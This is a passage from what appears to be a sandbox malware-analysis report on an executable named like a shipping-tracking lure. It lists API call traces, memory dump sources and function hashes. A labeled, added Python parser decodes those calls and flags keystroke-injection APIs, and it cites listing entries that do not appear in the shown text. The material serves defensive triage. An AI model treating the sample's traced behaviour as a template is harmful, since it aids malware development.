                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessagePost$KeyboardState$InputSend
                                      • String ID:
                                      • API String ID: 2221674350-0
                                      • Opcode ID: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                      • Instruction ID: 625ea0eb49cc588760ebb6bc0eb208289033378f73eea84c13a2ca11a8b118cf
                                      • Opcode Fuzzy Hash: 253f2b6e14f8b29283c151e9eff2603b50f4fedb3541a599f467ca45a100d6c4
                                      • Instruction Fuzzy Hash: D1514A725001187AEB109FA99C81BFFBB68AF9E311F44815BFD8496242C379D941CBA8
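Added example, not part of the Joe Sandbox report: a small Python parser for the "APIs" lines in this listing that decodes the message numbers passed to SendMessageW/PostMessageW into their Win32 names. The sample input is constructed from two of the entries above, the SendMessageW function whose String ID is Msctls_Progress32 and the GetKeyboardState/PostMessageW/SendInput function. Message numbers at or above WM_USER (0x400) are control-specific, so the PBM_* names are applied only when the caller states that the target is a progress bar; the capability tags and all helper names are this example's own, not the sandbox's.

```python
import re
from dataclasses import dataclass
from typing import List, Optional

# Constructed sample input: "APIs" entries copied from this report's listing.
PROGRESS_FUNC = """\
• SendMessageW.USER32(00000000,00002001,00000000,FF000000), ref: 00450BE7
• SendMessageW.USER32(00000000,00000409,00000000,FF000000), ref: 00450BF8
• SendMessageW.USER32(?,00000402,00000000,00000000), ref: 00450C06
• SendMessageW.USER32(?,00000401,00000000,00640000), ref: 00450C17
• SendMessageW.USER32(00000000,00000404,00000001,00000000), ref: 00450C25
"""
KEYBOARD_FUNC = """\
• GetKeyboardState.USER32(?), ref: 0044C570
• SetKeyboardState.USER32(00000080), ref: 0044C594
• PostMessageW.USER32(?,00000100,?,?), ref: 0044C5D5
• PostMessageW.USER32(?,00000104,?,?), ref: 0044C60D
• PostMessageW.USER32(?,00000102,?,00000001), ref: 0044C62F
• SendInput.USER32(00000001,?,0000001C), ref: 0044C6C2
"""

# One listing line: "[Part of subcall function X:] api.MODULE(args)[,] ref: addr".
# The argument list is optional because LIBCMT entries (e.g. _malloc.LIBCMT ref: ...) have none.
API_LINE = re.compile(
    r"^\s*(?:•\s*)?(?:Part of subcall function (?P<sub>[0-9A-F]+):\s*)?"
    r"(?P<api>\w+)\.(?P<module>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-F]+)"
)

WM_USER = 0x0400
# Window-independent messages seen on this page.
WINDOW_MESSAGES = {0x0100: "WM_KEYDOWN", 0x0102: "WM_CHAR", 0x0104: "WM_SYSKEYDOWN", 0x00F1: "BM_SETCHECK"}
# Progress-bar messages; only valid when the target window class is Msctls_Progress32.
PROGRESS_MESSAGES = {0x0401: "PBM_SETRANGE", 0x0402: "PBM_SETPOS", 0x0404: "PBM_SETSTEP",
                     0x0409: "PBM_SETBARCOLOR", 0x2001: "PBM_SETBKCOLOR"}
MESSAGE_APIS = {"SendMessageW", "SendMessageA", "PostMessageW", "PostMessageA"}


@dataclass
class ApiCall:
    api: str
    module: str
    args: List[str]              # raw hex strings; "?" where the sandbox could not resolve a value
    ref: str                     # call-site address
    subcall_of: Optional[str] = None
    message: Optional[str] = None  # decoded name when api is Send/PostMessage


def parse_api_lines(text: str) -> List[ApiCall]:
    """Parse the report's API listing into ApiCall records; unmatched lines are skipped."""
    calls = []
    for line in text.splitlines():
        m = API_LINE.match(line)
        if not m:
            continue
        args = [a.strip() for a in m.group("args").split(",")] if m.group("args") else []
        calls.append(ApiCall(m.group("api"), m.group("module"), args, m.group("ref"), m.group("sub")))
    return calls


def arg_int(arg: str) -> Optional[int]:
    """Hex argument to int; None for '?' (unresolved)."""
    try:
        return int(arg, 16)
    except ValueError:
        return None


def decode_messages(calls: List[ApiCall], control_class: Optional[str] = None) -> List[ApiCall]:
    """Fill in ApiCall.message for Send/PostMessage calls (second argument is uMsg)."""
    for c in calls:
        if c.api not in MESSAGE_APIS or len(c.args) < 2:
            continue
        msg = arg_int(c.args[1])
        if msg is None:
            continue
        if msg < WM_USER:
            c.message = WINDOW_MESSAGES.get(msg, f"WM_{msg:04X}")
        elif control_class == "Msctls_Progress32":
            c.message = PROGRESS_MESSAGES.get(msg, f"PBM_{msg:04X}")
        else:
            c.message = f"user_{msg:04X}"  # WM_USER-range message: needs the target class to name it
    return calls


def progress_range(calls: List[ApiCall]):
    """PBM_SETRANGE packs MAKELPARAM(low, high) into lParam; return (low, high)."""
    for c in calls:
        if c.message == "PBM_SETRANGE" and len(c.args) >= 4:
            lparam = arg_int(c.args[3])
            if lparam is not None:
                return (lparam & 0xFFFF, lparam >> 16)
    return None


def capabilities(calls: List[ApiCall]) -> set:
    """Coarse behaviour tags (this example's own vocabulary) from API names and decoded messages."""
    apis = {c.api for c in calls}
    msgs = {c.message for c in calls if c.message}
    tags = set()
    # Posting key messages or calling SendInput (0x1C = sizeof(INPUT) on 32-bit) injects keystrokes.
    if apis & {"SendInput", "keybd_event", "SetKeyboardState"} or msgs & {"WM_KEYDOWN", "WM_SYSKEYDOWN", "WM_CHAR"}:
        tags.add("synthetic keyboard input")
    if msgs & set(PROGRESS_MESSAGES.values()):
        tags.add("progress bar control")
    return tags


if __name__ == "__main__":
    bar = decode_messages(parse_api_lines(PROGRESS_FUNC), "Msctls_Progress32")
    print([c.message for c in bar], progress_range(bar), capabilities(bar))
    kb = decode_messages(parse_api_lines(KEYBOARD_FUNC))
    print([c.message for c in kb if c.message], capabilities(kb))
```

For the progress-bar function the decode gives PBM_SETBKCOLOR and PBM_SETBARCOLOR with CLR_DEFAULT (0xFF000000), PBM_SETPOS 0, PBM_SETRANGE 0..100 and PBM_SETSTEP 1, i.e. ordinary control initialisation; the second function posts WM_KEYDOWN/WM_SYSKEYDOWN/WM_CHAR and calls SendInput, which is what separates keystroke injection from plain GUI code when triaging a listing like this.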
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcscpy$_wcscat
                                      • String ID:
                                      • API String ID: 2037614760-0
                                      • Opcode ID: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                      • Instruction ID: 99b1098f8f7a3a84d55f117cb3556dd5d93458401dda30520ad7f1c57b96c0d6
                                      • Opcode Fuzzy Hash: d8b18b1f5d4952a0fc5752811c1295952a1c4566f52136af492825f039622e45
                                      • Instruction Fuzzy Hash: 0741357190011466DB34EF5998C1BFF7368EFE6314F84455FFC4287212DB2DAA92C2A9
                                      APIs
                                      • GetLastError.KERNEL32(?,?,00000000), ref: 00451BA0
                                      • VariantCopy.OLEAUT32(?,?), ref: 00451BF8
                                      • VariantCopy.OLEAUT32(-00000068,?), ref: 00451C0E
                                      • VariantCopy.OLEAUT32(-00000088,?), ref: 00451C27
                                      • VariantClear.OLEAUT32(-00000058), ref: 00451CA1
                                      • SysAllocString.OLEAUT32(00000000), ref: 00451CBA
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Variant$Copy$AllocClearErrorLastString
                                      • String ID:
                                      • API String ID: 960795272-0
                                      • Opcode ID: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                      • Instruction ID: e234943060a9aef7ccdf580943a4f321f6ba3cfb1df2bc58669f78ff50eabc4c
                                      • Opcode Fuzzy Hash: 218b2f6110521206867dfa84a42cd28f2b67ec3390fd0729a790b06cd777bcc7
                                      • Instruction Fuzzy Hash: C751AE719042099FCB14DF65CC84BAAB7B4FF48300F14856EED05A7361DB79AE45CBA8
                                      APIs
                                      • BeginPaint.USER32(00000000,?), ref: 00447BDF
                                      • GetWindowRect.USER32(?,?), ref: 00447C5D
                                      • ScreenToClient.USER32(?,?), ref: 00447C7B
                                      • SetViewportOrgEx.GDI32(00000000,?,?,00000000), ref: 00447C8E
                                      • Rectangle.GDI32(00000000,00000000,00000000,?,?), ref: 00447CD5
                                      • EndPaint.USER32(?,?), ref: 00447D13
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Paint$BeginClientRectRectangleScreenViewportWindow
                                      • String ID:
                                      • API String ID: 4189319755-0
                                      • Opcode ID: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                      • Instruction ID: 4e3fb435071a661ad846631c1082d1486cc319c76cae6976ccfd06e2d512f03c
                                      • Opcode Fuzzy Hash: 0de1757924998e3fd5473b1ac31060e8ba53e31114793872216692834f921a18
                                      • Instruction Fuzzy Hash: DC417F706042019FE310DF14D8C4F7B7BA8EB86724F14466EF9A487391CB74A806CB69
                                      APIs
                                      • SendMessageW.USER32(?,00001024,00000000,00000000), ref: 0044908B
                                      • SendMessageW.USER32(?,00000409,00000000,?), ref: 0044909F
                                      • SendMessageW.USER32(?,0000111E,00000000,00000000), ref: 004490B3
                                      • InvalidateRect.USER32(?,00000000,00000001,?,0000111E,00000000,00000000,?,00000409,00000000,?), ref: 004490C9
                                      • GetWindowLongW.USER32(?,000000F0), ref: 004490D4
                                      • SetWindowLongW.USER32(?,000000F0,00000000), ref: 004490E1
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: MessageSend$LongWindow$InvalidateRect
                                      • String ID:
                                      • API String ID: 1976402638-0
                                      • Opcode ID: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                      • Instruction ID: 8674d855734444f977eaeabaa32478bd653fbe911923e0a4a3d3eb28cec46bd0
                                      • Opcode Fuzzy Hash: 2001084b9f030ce18b996af9061ac6ceee4bb7592284355317d8a12df4a6bddd
                                      • Instruction Fuzzy Hash: 2531E135240104AFF724CF48DC89FBB77B9EB49320F10851AFA559B290CA79AD41DB69
                                      APIs
                                      • ShowWindow.USER32(?,00000000), ref: 00440A8A
                                      • EnableWindow.USER32(?,00000000), ref: 00440AAF
                                      • ShowWindow.USER32(?,00000000), ref: 00440B18
                                      • ShowWindow.USER32(?,00000004), ref: 00440B2B
                                      • EnableWindow.USER32(?,00000001), ref: 00440B50
                                      • SendMessageW.USER32(?,0000130C,?,00000000), ref: 00440B75
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                       • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                       • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Show$Enable$MessageSend
                                      • String ID:
                                      • API String ID: 642888154-0
                                      • Opcode ID: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                      • Instruction ID: a5db896fb2ae06c85211a956f566d4ff66a2da6af11bfa2c2b637766cd700386
                                      • Opcode Fuzzy Hash: 7c24049b1d37fdb6142be8766dc22fb93f1068172a9e83c57f7795f596ff73c7
                                      • Instruction Fuzzy Hash: F4413C346003409FEB25CF24C588BA67BE1FF55304F1885AAEB599B3A1CB78A851CB58
                                      APIs
                                      • SendMessageW.USER32(?,000000F1,?,00000000), ref: 0044881F
                                      • EnableWindow.USER32(?,00000000), ref: 00448B5C
                                      • EnableWindow.USER32(?,00000001), ref: 00448B72
                                      • ShowWindow.USER32(?,00000000), ref: 00448BE8
                                      • ShowWindow.USER32(?,00000004), ref: 00448BF4
                                      • EnableWindow.USER32(?,00000001), ref: 00448C09
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Window$Enable$Show$MessageSend
                                      • String ID:
                                      • API String ID: 1871949834-0
                                      • Opcode ID: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                      • Instruction ID: ab733961f10eda6fa12bc0977b233c6b2b6736debfa9bed553c9f015fe8cd40e
                                      • Opcode Fuzzy Hash: 24295af7dc8a36502def6d29e9c9bc5dd9332af4054e76ab47d27171ed2ecc38
                                      • Instruction Fuzzy Hash: 6931B3B17443815BF7258E24CCC4BAFB7D0EB95345F08482EF58196291DBAC9845C75A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID:
                                      • String ID:
                                      • API String ID:
                                      • Opcode ID: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                      • Instruction ID: c6101d665a98d140be62f029472ab7f8db1b0ce4c02a7c647e8453833b83309f
                                      • Opcode Fuzzy Hash: b4f5e70efc1acb4fe019c63046a51222323f6892fbde794835cc8a87d9f58231
                                      • Instruction Fuzzy Hash: 5F21B672204110ABEB108F699C85B6F7798EB49370F24463BF625C62E0DB74D8C1C76D
                                      APIs
                                      • ExtractIconExW.SHELL32(?,?,00000000,?,00000001), ref: 00471A45
                                      • ImageList_Create.COMCTL32(00000010,00000010,00000021,00000001,00000001,?,00000000,?,00000001), ref: 00471A86
                                      • SendMessageW.USER32(?,00001303,00000000,00000000), ref: 00471AA8
                                      • ImageList_ReplaceIcon.COMCTL32(?,?,?,?,00000000,?,00000001), ref: 00471ABF
                                      • SendMessageW.USER32 ref: 00471AE3
                                      • DestroyIcon.USER32(?), ref: 00471AF4
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Icon$ImageList_MessageSend$CreateDestroyExtractReplace
                                      • String ID:
                                      • API String ID: 3611059338-0
                                      • Opcode ID: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                      • Instruction ID: ff529b192773d28f9e5fe2f6f8d7a9043cb056f7fe4a3f7912da33dbd9270a4a
                                      • Opcode Fuzzy Hash: b0e439fc93c86aa425f752c0c26de9476ffc90f5fc0a1de8674fd8c7e7c0c220
                                      • Instruction Fuzzy Hash: FB21AB71600204AFEB10CF64DD85FAA73B5FF88700F10846EFA05AB290DBB4A9428B64
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: DestroyWindow$DeleteObject$IconMove
                                      • String ID:
                                      • API String ID: 1640429340-0
                                      • Opcode ID: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                      • Instruction ID: 1af524ae86da71fe4f89171a472fc693caa25f853ed14bd6ff7d4c509651bbe6
                                      • Opcode Fuzzy Hash: a9e5de2d3b90f467c30d036e219f0746eef0d56afd734d018f8f78b53e6c5f41
                                      • Instruction Fuzzy Hash: C6311874200A41DFC710DF24D9D8B3A77E9FB48712F0445AAE946CB262D778E848CB69
                                      APIs
                                        • Part of subcall function 00410160: _wcslen.LIBCMT ref: 00410162
                                        • Part of subcall function 00410160: _wcscpy.LIBCMT ref: 00410182
                                      • _wcslen.LIBCMT ref: 004438CD
                                      • _wcslen.LIBCMT ref: 004438E6
                                      • _wcstok.LIBCMT ref: 004438F8
                                      • _wcslen.LIBCMT ref: 0044390C
                                      • GetTextExtentPoint32W.GDI32(?,00000000,00000000,?), ref: 0044391A
                                      • _wcstok.LIBCMT ref: 00443931
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: _wcslen$_wcstok$ExtentPoint32Text_wcscpy
                                      • String ID:
                                      • API String ID: 3632110297-0
                                      • Opcode ID: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                      • Instruction ID: d12b8bce329459066c03420e1b0c57cf331e6d1a2def9435cce8fb2ce1fb425a
                                      • Opcode Fuzzy Hash: 5ca99eab14a2200aefa90245e429ddeb3cf04e0f88646427c0d38f27a71423b2
                                      • Instruction Fuzzy Hash: 9621B072900305ABDB10AF559C82AAFB7F8FF48711F64482EF95993301E678EA5087A5
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteMenuObject$IconWindow
                                      • String ID:
                                      • API String ID: 752480666-0
                                      • Opcode ID: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                      • Instruction ID: 7b220c8407ffc283b2c26cc65a644285b0b18e1ed163c7e0472fb9f2b18bc557
                                      • Opcode Fuzzy Hash: 877022e28911037ff8e4029beee24c6714a8c165e8bca7c16b59b5f39fc2e0c5
                                      • Instruction Fuzzy Hash: B7215970600A01DFD714DF29D9E8B3A7BA9BF49312F04855AE8468B352C738EC89CB59
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
                                      • API ID: Destroy$DeleteObjectWindow$IconImageList_
                                      • String ID:
                                      • API String ID: 3275902921-0
                                      • Opcode ID: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                      • Instruction ID: 11d86efc281b6c380d974b68bd8b9632be9d9c574e85584f431c859402bfc888
                                      • Opcode Fuzzy Hash: bee8e7950a17a017ef8c4c424090cfe506cbffc57fc41e64353b46a851298919
                                      • Instruction Fuzzy Hash: 9C217C70200A01DFC714DF39D998A6AB7E4BF49311F10862EE959C7392D778D845CB58
                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1451020865.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1451006754.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451061521.0000000000482000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451076921.0000000000490000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451090789.0000000000491000.00000008.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.0000000000492000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451103531.00000000004A7000.00000004.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1451132843.00000000004AB000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_TNT AWB TRACKING DETAILS.jbxd
                                      Similarity
